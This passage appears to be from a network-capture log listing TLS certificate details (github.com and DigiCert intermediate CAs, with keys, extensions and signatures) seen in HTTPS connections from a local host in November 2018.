Wed May 13 14:00:00 CEST 2020] Issuer: CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US SerialNumber: [ 083a8459 2f77f2e7 951bf887 cedec966]Certificate Extensions: 10[1]: ObjectId: 1.3.6.1.4.1.11129.2.4.2 Criticality=falseExtension unknown: DER encoded OCTET string =0000: 04 82 01 E5 04 82 01 E1 01 DF 00 76 00 A4 B9 09 ...........v....0010: 90 B4 18 58 14 87 BB 13 A2 CC 67 70 0A 3C 35 98 ...X......gp.<5.0020: 04 F9 1B DF B8 E3 77 CD 0E C8 0D DC 10 00 00 01 ......w.........0030: 5A FD 40 6A 04 00 00 04 03 00 47 30 45 02 20 45 Z.@j......G0E. E0040: 5E C5 9A 0B 56 EE A7 C4 34 26 0A D8 F4 48 08 C6 ^...V...4&...H..0050: 3A A2 D6 FD 9F 03 A6 60 E3 88 91 5D 24 32 CB 02 :......`...]$2..0060: 21 00 8C E1 CD 4D 73 96 C7 89 87 9F B2 5D CE 54 !....Ms......].T0070: D4 8F A9 82 A4 66 5D BD 57 70 F2 2C 18 BF 28 39 .....f].Wp.,..(90080: DC 23 00 75 00 56 14 06 9A 2F D7 C2 EC D3 F5 E1 .#.u.V.../......0090: BD 44 B2 3E C7 46 76 B9 BC 99 11 5C C0 EF 94 98 .D.>.Fv....\....00A0: 55 D6 89 D0 DD 00 00 01 5A FD 40 6A 65 00 00 04 U.......Z.@je...00B0: 03 00 46 30 44 02 20 4A 40 CB 32 4A 68 FA F6 82 ..F0D. J@.2Jh...00C0: 99 31 E0 BE 30 3A 24 2E BA D5 37 6B 4A F8 E3 25 .1..0:$...7kJ..%00D0: CD FD 53 E6 A8 07 B6 02 20 44 92 CD 1A F7 D6 0E ..S..... D......00E0: 63 29 08 AF E2 58 F4 A6 32 C6 0A DB 26 32 4E 5F c)...X..2...&2N_00F0: 4A 6E D1 C1 B4 FE 56 A6 47 00 76 00 EE 4B BD B7 Jn....V.G.v..K..0100: 75 CE 60 BA E1 42 69 1F AB E1 9E 66 A3 0F 7E 5F u.`..Bi....f..._0110: B0 72 D8 83 00 C4 7B 89 7A A8 FD CB 00 00 01 5A .r......z......Z0120: FD 40 6A 1F 00 00 04 03 00 47 30 45 02 20 0D A7 .@j......G0E. ..0130: D1 36 DE 01 AE 4A 6E E3 A9 9D 7A 49 6E 73 9B C1 .6...Jn...zIns..0140: C9 29 3A C1 EC 68 DF B6 AC 0E D9 03 5E 98 02 21 .):..h......^..!0150: 00 97 B2 53 9D 53 DD 98 57 1A BB 3C 0B 8E 03 44 ...S.S..W..<...D0160: 48 C4 45 B6 7E 01 AF 39 BD 5C 94 CF 25 B6 96 3D H.E....9.\..%..=0170: A7 00 76 00 BB D9 DF BC 1F 8A 71 B5 93 94 23 97 ..v.......q...#.0180: AA 92 7B 47 38 57 95 0A AB 52 E8 1A 90 96 64 36 ...G8W...R....d60190: 8E 1E D1 85 00 00 01 5A FD 40 6A 11 00 00 04 03 .......Z.@j.....01A0: 00 47 30 45 02 21 00 AA AE DB AA EF 52 7A 4C CE .G0E.!......RzL.01B0: F0 28 C5 9E 48 04 4E 75 36 BC 7F 7E 46 A0 B3 08 .(..H.Nu6...F...01C0: 98 95 CE 35 23 47 7D 02 20 38 DB D2 BB F5 47 E6 ...5#G.. 8....G.01D0: 39 59 D7 E3 C3 F9 BE 93 84 51 75 FA 95 7B C2 9E 9Y.......Qu.....01E0: F0 AB EF FC C6 21 D4 32 5B .....!.2[[2]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.digicert.com, accessMethod: caIssuers accessLocation: URIName: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt]][3]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 51 68 FF 90 AF 02 07 75 3C CC D9 65 64 62 A2 12 Qh.....u<..edb..0010: B8 59 72 3B .Yr;]][4]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][5]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl3.digicert.com/sha2-ha-server-g5.crl], DistributionPoint: [URIName: http://crl4.digicert.com/sha2-ha-server-g5.crl]]][6]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.16.840.1.114412.1.1][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1C 68 74 74 70 73 3A 2F 2F 77 77 77 2E 64 69 ..https://www.di0010: 67 69 63 65 72 74 2E 63 6F 6D 2F 43 50 53 gicert.com/CPS]] ] [CertificatePolicyId: [2.23.140.1.2.2][] ]][7]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][8]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_Encipherment][9]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: www.github.com DNSName: *.github.com DNSName: github.com DNSName: *.github.io DNSName: github.io DNSName: *.githubusercontent.com DNSName: githubusercontent.com][10]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 30 82 29 D8 6D 4C E0 D4 A2 C6 10 48 05 80 87 A8 0.).mL.....H....0010: BC AA E9 12 ....]]] Algorithm: [SHA256withRSA] Signature:0000: 99 7E D6 2F CE 1B A6 15 F5 15 B3 EF F1 30 C1 1F .../.........0..0010: 54 10 92 A4 8C 43 C0 BC BD A5 0D 00 53 E2 42 C1 T....C......S.B.0020: 85 6F E5 A7 A9 41 99 4B 46 11 5A DD FD E8 27 69 .o...A.KF.Z...'i0030: 97 B6 3C A6 0E 2A 30 DB 33 53 BE 83 B0 AA 08 89 ..<..*0.3S......0040: 04 7E 66 35 E5 5C B3 2C 28 7F A7 B1 E5 27 79 6D ..f5.\.,(....'ym0050: 81 26 89 EA A0 55 51 70 10 CB EB 43 59 6B AA 52 .&...UQp...CYk.R0060: B4 46 FD D2 FF 89 16 8A 45 DA 0E BF 87 0D 53 EF .F......E.....S.0070: 83 24 C5 17 AD 12 63 40 74 80 4D BD A4 C9 DD 74 .$....c@t.M....t0080: D9 DF 1C 61 02 0A 71 B0 93 24 2F 2D A9 20 7A 43 ...a..q..$/-. zC0090: 86 44 11 58 8A 45 9B D7 5C E2 66 EB A6 C6 F1 7C .D.X.E..\.f.....00A0: A7 DC DD AF 27 89 39 F7 C1 9A 99 C8 7F 34 7A D9 ....'.9......4z.00B0: 39 73 83 CB 73 75 BC 16 B0 4E A1 49 2D 09 12 8D 9s..su...N.I-...00C0: 4E 3E 63 FF F0 88 71 DF 50 46 2B A5 38 3D DB 38 N>c...q.PF+.8=.800D0: 08 97 29 64 DE CB C7 EB 88 70 59 DD 62 DC 16 76 ..)d.....pY.b..v00E0: 2D 30 6A E3 A3 2F 40 A5 36 0F CC 05 76 D5 E0 6E -0j../@.6...v..n00F0: 04 40 3D 6A 21 5F BF 4E A3 A8 6C D0 98 21 B9 BD .@=j!_.N..l..!..]
    Nov 2, 2018 10:59:55.252080917 MEZ44349245151.101.0.133192.168.0.50CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028[[ Version: V3 Subject: CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 23085922014910748503624791917480115148492919026914207610707020942093828159221184419960399297678177590153378092714640886296044490661625022319263060388275515964365478738040978664516396912933675650257207760237777280773935047177225664304566903694731631728916260237117586511459590661362255543750987738241463266555577715629664656907640120826399947323444556799362651693283202076722872218490347588587929811327918605576169523712767591239193274840826201053308722900104999956283622772648025895714833602740679819670062830777938157004975732087864164660384513848296643542134747514357423990884765641067184766081973460304136714018531 public exponent: 65537 Validity: [From: Tue Oct 22 14:00:00 CEST 2013, To: Sun Oct 22 14:00:00 CEST 2028] Issuer: CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US SerialNumber: [ 04e1e7a4 dc5cf2f3 6dc02b42 b85d159f]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.digicert.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: B1 3E C3 69 03 F8 BF 47 01 D4 98 26 1A 08 02 EF .>.i...G...&....0010: 63 64 2B C3 cd+.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1C 68 74 74 70 73 3A 2F 2F 77 77 77 2E 64 69 ..https://www.di0010: 67 69 63 65 72 74 2E 63 6F 6D 2F 43 50 53 gicert.com/CPS]] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 51 68 FF 90 AF 02 07 75 3C CC D9 65 64 62 A2 12 Qh.....u<..edb..0010: B8 59 72 3B .Yr;]]] Algorithm: [SHA256withRSA] Signature:0000: 18 8A 95 89 03 E6 6D DF 5C FC 1D 68 EA 4A 8F 83 ......m.\..h.J..0010: D6 51 2F 8D 6B 44 16 9E AC 63 F5 D2 6E 6C 84 99 .Q/.kD...c..nl..0020: 8B AA 81 71 84 5B ED 34 4E B0 B7 79 92 29 CC 2D ...q.[.4N..y.).-0030: 80 6A F0 8E 20 E1 79 A4 FE 03 47 13 EA F5 86 CA .j.. .y...G.....0040: 59 71 7D F4 04 96 6B D3 59 58 3D FE D3 31 25 5C Yq....k.YX=..1%\0050: 18 38 84 A3 E6 9F 82 FD 8C 5B 98 31 4E CD 78 9E .8.......[.1N.x.0060: 1A FD 85 CB 49 AA F2 27 8B 99 72 FC 3E AA D5 41 ....I..'..r.>..A0070: 0B DA D5 36 A1 BF 1C 6E 47 49 7F 5E D9 48 7C 03 ...6...nGI.^.H..0080: D9 FD 8B 49 A0 98 26 42 40 EB D6 92 11 A4 64 0A ...I..&B@.....d.0090: 57 54 C4 F5 1D D6 02 5E 6B AC EE C4 80 9A 12 72 WT.....^k......r00A0: FA 56 93 D7 FF BF 30 85 06 30 BF 0B 7F 4E FF 57 .V....0..0...N.W00B0: 05 9D 24 ED 85 C3 2B FB A6 75 A8 AC 2D 16 EF 7D ..$...+..u..-...00C0: 79 27 B2 EB C2 9D 0B 07 EA AA 85 D3 01 A3 20 28 y'............ (00D0: 41 59 43 28 D2 81 E3 AA F6 EC 7B 3B 77 B6 40 62 AYC(.......;w.@b00E0: 80 05 41 45 01 EF 17 06 3E DE C0 33 9B 67 D3 61 ..AE....>..3.g.a00F0: 2E 72 87 E4 69 FC 12 00 57 40 1E 70 F5 1E C9 B4 .r..i...W@.p....]
    Nov 2, 2018 10:59:58.713907003 MEZ44349246192.30.253.113192.168.0.50CN=github.com, O="GitHub, Inc.", L=San Francisco, ST=California, C=US, SERIALNUMBER=5157550, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private OrganizationCN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue May 08 02:00:00 CEST 2018Wed Jun 03 14:00:00 CEST 2020[[ Version: V3 Subject: CN=github.com, O="GitHub, Inc.", L=San Francisco, ST=California, C=US, SERIALNUMBER=5157550, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 25025100770112519133826373044337089322469791879220152213643221754976969243477927257227415181039366015609149001175458675631697702239034823716334509809784926406937227125890521894087124165874208928008511527244368706849310092475511259401776633076671238008575313180508596720476568749022900129891932143823778833404532554658303977351639532131107111874168053266560861447299063764771943313867349795002140249378509492410727023509926138655327290063258841194245159501288231930813126290727910076185376418441777313922434226388044466254908262848472806237246586907086347793775219421137443851512766147228992395134669954845000049168203 public exponent: 65537 Validity: [From: Tue May 08 02:00:00 CEST 2018, To: Wed Jun 03 14:00:00 CEST 2020] Issuer: CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US SerialNumber: [ 0a063042 7f5bbced 69573965 93b6451f]Certificate Extensions: 10[1]: ObjectId: 1.3.6.1.4.1.11129.2.4.2 Criticality=falseExtension unknown: DER encoded OCTET string =0000: 04 82 01 6E 04 82 01 6A 01 68 00 76 00 A4 B9 09 ...n...j.h.v....0010: 90 B4 18 58 14 87 BB 13 A2 CC 67 70 0A 3C 35 98 ...X......gp.<5.0020: 04 F9 1B DF B8 E3 77 CD 0E C8 0D DC 10 00 00 01 ......w.........0030: 63 41 62 6D 0A 00 00 04 03 00 47 30 45 02 21 00 cAbm......G0E.!.0040: D1 66 9D FC 71 35 AC 58 7D 86 74 1A 5E FE E3 D3 .f..q5.X..t.^...0050: 5A 7B 2E FE 6E 01 10 2D BE 74 87 2F 4B 29 19 62 Z...n..-.t./K).b0060: 02 20 08 FE 60 1A FE B2 CD A6 B3 C4 12 B6 37 01 . ..`.........7.0070: 9D 9A 6C AE 10 53 52 83 6A 40 45 B3 09 95 41 60 ..l..SR.j@E...A`0080: 53 95 00 76 00 56 14 06 9A 2F D7 C2 EC D3 F5 E1 S..v.V.../......0090: BD 44 B2 3E C7 46 76 B9 BC 99 11 5C C0 EF 94 98 .D.>.Fv....\....00A0: 55 D6 89 D0 DD 00 00 01 63 41 62 6D 2D 00 00 04 U.......cAbm-...00B0: 03 00 47 30 45 02 21 00 A2 EE 89 94 BD 82 E6 D1 ..G0E.!.........00C0: BD 8B A1 BB 44 79 10 18 9E 52 28 EE 7E 89 C5 B6 ....Dy...R(.....00D0: 1D AE D6 1D 98 F5 16 25 02 20 56 0C 35 01 9E 75 .......%. V.5..u00E0: BC AF 44 36 29 C1 83 6D 85 3F 16 FC D9 3B CD 0C ..D6)..m.?...;..00F0: ED 39 4F 5E E1 C5 74 42 D8 86 00 76 00 BB D9 DF .9O^..tB...v....0100: BC 1F 8A 71 B5 93 94 23 97 AA 92 7B 47 38 57 95 ...q...#....G8W.0110: 0A AB 52 E8 1A 90 96 64 36 8E 1E D1 85 00 00 01 ..R....d6.......0120: 63 41 62 6D DF 00 00 04 03 00 47 30 45 02 21 00 cAbm......G0E.!.0130: A1 CD D4 CA 51 4D 8D F9 77 2A 70 AD 0E 25 8A CD ....QM..w*p..%..0140: F0 46 32 9E 5A 15 C6 1A 38 C8 F9 3A 0E AD C4 3E .F2.Z...8..:...>0150: 02 20 74 D1 F9 BB CA C2 DD 47 2C 95 05 78 07 DA . t......G,..x..0160: 34 6B 4C 36 D3 8A 26 0D 11 06 29 35 6E 12 9C 46 4kL6..&...)5n..F0170: 78 E4 x.[2]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.digicert.com, accessMethod: caIssuers accessLocation: URIName: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt]][3]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 3D D3 50 A5 D6 A0 AD EE F3 4A 60 0A 65 D3 21 D4 =.P......J`.e.!.0010: F8 F8 D6 0F ....]][4]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][5]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl3.digicert.com/sha2-ev-server-g2.crl], DistributionPoint: [URIName: http://crl4.digicert.com/sha2-ev-server-g2.crl]]][6]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.16.840.1.114412.2.1][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1C 68 74 74 70 73 3A 2F 2F 77 77 77 2E 64 69 ..https://www.di0010: 67 69 63 65 72 74 2E 63 6F 6D 2F 43 50 53 gicert.com/CPS]] ] [CertificatePolicyId: [2.23.140.1.1][] ]][7]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][8]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_Encipherment][9]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: github.com DNSName: www.github.com][10]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: C9 C2 53 61 66 9D 5F AB 25 F4 26 CD 0F 38 9A A8 ..Saf._.%.&..8..0010: 49 EA 48 A9 I.H.]]] Algorithm: [SHA256withRSA] Signature:0000: 70 0F 5A 96 A7 58 E5 BF 8A 9D A8 27 98 2B 00 7F p.Z..X.....'.+..0010: 26 A9 07 DA BA 7B 82 54 4F AF 69 CF BC F2 59 03 &......TO.i...Y.0020: 2B F2 D5 74 58 25 D8 1E A4 20 76 62 60 29 73 2A +..tX%... vb`)s*0030: D7 DC CC 6F 77 85 6B CA 6D 24 F8 35 13 47 3F D2 ...ow.k.m$.5.G?.0040: E2 69 0A 9D 34 2D 7B 7B 9B CD 1E 75 D5 50 6C 3E .i..4-.....u.Pl>0050: CB 1C A3 30 B1 AA 92 07 A9 3A 76 76 45 BD 78 91 ...0.....:vvE.x.0060: C4 CE 1A 9E 22 E4 0B 89 BA E6 8C C1 79 82 A3 B8 ....".......y...0070: D4 C0 FC 1F 2D ED 4D 52 55 41 2A A8 3A 2C AD 07 ....-.MRUA*.:,..0080: 72 AE 0A D2 C6 67 C4 4F 07 17 18 99 F7 65 A9 57 r....g.O.....e.W0090: 60 15 5A 34 4C 11 CF F6 CF 6B 21 36 80 EF C6 F1 `.Z4L....k!6....00A0: 54 63 26 35 39 EE BB C4 83 64 9B 24 0A 73 EC A0 Tc&59....d.$.s..00B0: 48 16 73 C8 B9 D7 48 55 56 98 7A F7 BB 97 5C 69 H.s...HUV.z...\i00C0: A4 06 18 04 78 DA FE 98 76 BE 22 2F 7F 07 77 87 ....x...v."/..w.00D0: 4E 88 19 9A F8 55 EC 5C 12 2A 59 48 DB 49 3E 15 N....U.\.*YH.I>.00E0: 5E 67 5A A2 5E EE CC 53 28 8C 0E 33 93 14 03 64 ^gZ.^..S(..3...d00F0: 0B C5 E5 78 09 94 01 5A 75 FC 92 9D AF ED 7A 29 ...x...Zu.....z)]
    Nov 2, 2018 10:59:58.713907003 MEZ44349246192.30.253.113192.168.0.50CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028[[ Version: V3 Subject: CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 27182480329609083645624358951312470735111101465904409517579603324443610948627123317276574372284092612395466705913697296538729051610615914979630979130353728187634968718301037795642657343511174042315836449309023250377748929072088632079297292400799455978070288868084050898983836205888774855547544255622648360396227755156561340192722735895290847161205245369772696734401944671246358701321167149070896780343739667326363444343051093227411009129654263748425661222582889902796954800796685968517689977802189122916931470605744698837719347057766694419404975072163417802333656859496792447815284011528855507761771697613578237909299 public exponent: 65537 Validity: [From: Tue Oct 22 14:00:00 CEST 2013, To: Sun Oct 22 14:00:00 CEST 2028] Issuer: CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US SerialNumber: [ 0c79a944 b08c1195 2092615f e26b1d83]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.digicert.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: B1 3E C3 69 03 F8 BF 47 01 D4 98 26 1A 08 02 EF .>.i...G...&....0010: 63 64 2B C3 cd+.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1C 68 74 74 70 73 3A 2F 2F 77 77 77 2E 64 69 ..https://www.di0010: 67 69 63 65 72 74 2E 63 6F 6D 2F 43 50 53 gicert.com/CPS]] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 3D D3 50 A5 D6 A0 AD EE F3 4A 60 0A 65 D3 21 D4 =.P......J`.e.!.0010: F8 F8 D6 0F ....]]] Algorithm: [SHA256withRSA] Signature:0000: 9D B6 D0 90 86 E1 86 02 ED C5 A0 F0 34 1C 74 C1 ............4.t.0010: 8D 76 CC 86 0A A8 F0 4A 8A 42 D6 3F C8 A9 4D AD .v.....J.B.?..M.0020: 7C 08 AD E6 B6 50 B8 A2 1A 4D 88 07 B1 29 21 DC .....P...M...)!.0030: E7 DA C6 3C 21 E0 E3 11 49 70 AC 7A 1D 01 A4 CA ...<!...Ip.z....0040: 11 3A 57 AB 7D 57 2A 40 74 FD D3 1D 85 18 50 DF .:W..W*@t.....P.0050: 57 47 75 A1 7D 55 20 2E 47 37 50 72 8C 7F 82 1B WGu..U .G7Pr....0060: D2 62 8F 2D 03 5A DA C3 C8 A1 CE 2C 52 A2 00 63 .b.-.Z.....,R..c0070: EB 73 BA 71 C8 49 27 23 97 64 85 9E 38 0E AD 63 .s.q.I'#.d..8..c0080: 68 3C BA 52 81 58 79 A3 2C 0C DF DE 6D EB 31 F2 h<.R.Xy.,...m.1.0090: BA A0 7C 6C F1 2C D4 E1 BD 77 84 37 03 CE 32 B5 ...l.,...w.7..2.00A0: C8 9A 81 1A 4A 92 4E 3B 46 9A 85 FE 83 A2 F9 9E ....J.N;F.......00B0: 8C A3 CC 0D 5E B3 3D CF 04 78 8F 14 14 7B 32 9C ....^.=..x....2.00C0: C7 00 A6 5C C4 B5 A1 55 8D 5A 56 68 A4 22 70 AA ...\...U.ZVh."p.00D0: 3C 81 71 D9 9D A8 45 3B F4 E5 F6 A2 51 DD C7 7B <.q...E;....Q...00E0: 62 E8 6F 0C 74 EB B8 DA F8 BF 87 0D 79 50 91 90 b.o.t.......yP..00F0: 9B 18 3B 91 59 27 F1 35 28 13 AB 26 7E D5 F7 7A ..;.Y'.5(..&...z]
    Nov 2, 2018 11:01:22.358278036 MEZ44349248192.30.253.113192.168.0.50CN=github.com, O="GitHub, Inc.", L=San Francisco, ST=California, C=US, SERIALNUMBER=5157550, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private OrganizationCN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue May 08 02:00:00 CEST 2018Wed Jun 03 14:00:00 CEST 2020[[ Version: V3 Subject: CN=github.com, O="GitHub, Inc.", L=San Francisco, ST=California, C=US, SERIALNUMBER=5157550, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 25025100770112519133826373044337089322469791879220152213643221754976969243477927257227415181039366015609149001175458675631697702239034823716334509809784926406937227125890521894087124165874208928008511527244368706849310092475511259401776633076671238008575313180508596720476568749022900129891932143823778833404532554658303977351639532131107111874168053266560861447299063764771943313867349795002140249378509492410727023509926138655327290063258841194245159501288231930813126290727910076185376418441777313922434226388044466254908262848472806237246586907086347793775219421137443851512766147228992395134669954845000049168203 public exponent: 65537 Validity: [From: Tue May 08 02:00:00 CEST 2018, To: Wed Jun 03 14:00:00 CEST 2020] Issuer: CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US SerialNumber: [ 0a063042 7f5bbced 69573965 93b6451f]Certificate Extensions: 10[1]: ObjectId: 1.3.6.1.4.1.11129.2.4.2 Criticality=falseExtension unknown: DER encoded OCTET string =0000: 04 82 01 6E 04 82 01 6A 01 68 00 76 00 A4 B9 09 ...n...j.h.v....0010: 90 B4 18 58 14 87 BB 13 A2 CC 67 70 0A 3C 35 98 ...X......gp.<5.0020: 04 F9 1B DF B8 E3 77 CD 0E C8 0D DC 10 00 00 01 ......w.........0030: 63 41 62 6D 0A 00 00 04 03 00 47 30 45 02 21 00 cAbm......G0E.!.0040: D1 66 9D FC 71 35 AC 58 7D 86 74 1A 5E FE E3 D3 .f..q5.X..t.^...0050: 5A 7B 2E FE 6E 01 10 2D BE 74 87 2F 4B 29 19 62 Z...n..-.t./K).b0060: 02 20 08 FE 60 1A FE B2 CD A6 B3 C4 12 B6 37 01 . ..`.........7.0070: 9D 9A 6C AE 10 53 52 83 6A 40 45 B3 09 95 41 60 ..l..SR.j@E...A`0080: 53 95 00 76 00 56 14 06 9A 2F D7 C2 EC D3 F5 E1 S..v.V.../......0090: BD 44 B2 3E C7 46 76 B9 BC 99 11 5C C0 EF 94 98 .D.>.Fv....\....00A0: 55 D6 89 D0 DD 00 00 01 63 41 62 6D 2D 00 00 04 U.......cAbm-...00B0: 03 00 47 30 45 02 21 00 A2 EE 89 94 BD 82 E6 D1 ..G0E.!.........00C0: BD 8B A1 BB 44 79 10 18 9E 52 28 EE 7E 89 C5 B6 ....Dy...R(.....00D0: 1D AE D6 1D 98 F5 16 25 02 20 56 0C 35 01 9E 75 .......%. V.5..u00E0: BC AF 44 36 29 C1 83 6D 85 3F 16 FC D9 3B CD 0C ..D6)..m.?...;..00F0: ED 39 4F 5E E1 C5 74 42 D8 86 00 76 00 BB D9 DF .9O^..tB...v....0100: BC 1F 8A 71 B5 93 94 23 97 AA 92 7B 47 38 57 95 ...q...#....G8W.0110: 0A AB 52 E8 1A 90 96 64 36 8E 1E D1 85 00 00 01 ..R....d6.......0120: 63 41 62 6D DF 00 00 04 03 00 47 30 45 02 21 00 cAbm......G0E.!.0130: A1 CD D4 CA 51 4D 8D F9 77 2A 70 AD 0E 25 8A CD ....QM..w*p..%..0140: F0 46 32 9E 5A 15 C6 1A 38 C8 F9 3A 0E AD C4 3E .F2.Z...8..:...>0150: 02 20 74 D1 F9 BB CA C2 DD 47 2C 95 05 78 07 DA . t......G,..x..0160: 34 6B 4C 36 D3 8A 26 0D 11 06 29 35 6E 12 9C 46 4kL6..&...)5n..F0170: 78 E4 x.[2]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.digicert.com, accessMethod: caIssuers accessLocation: URIName: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt]][3]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 3D D3 50 A5 D6 A0 AD EE F3 4A 60 0A 65 D3 21 D4 =.P......J`.e.!.0010: F8 F8 D6 0F ....]][4]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][5]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl3.digicert.com/sha2-ev-server-g2.crl], DistributionPoint: [URIName: http://crl4.digicert.com/sha2-ev-server-g2.crl]]][6]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.16.840.1.114412.2.1][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1C 68 74 74 70 73 3A 2F 2F 77 77 77 2E 64 69 ..https://www.di0010: 67 69 63 65 72 74 2E 63 6F 6D 2F 43 50 53 gicert.com/CPS]] ] [CertificatePolicyId: [2.23.140.1.1][] ]][7]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][8]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_Encipherment][9]: ObjectId: 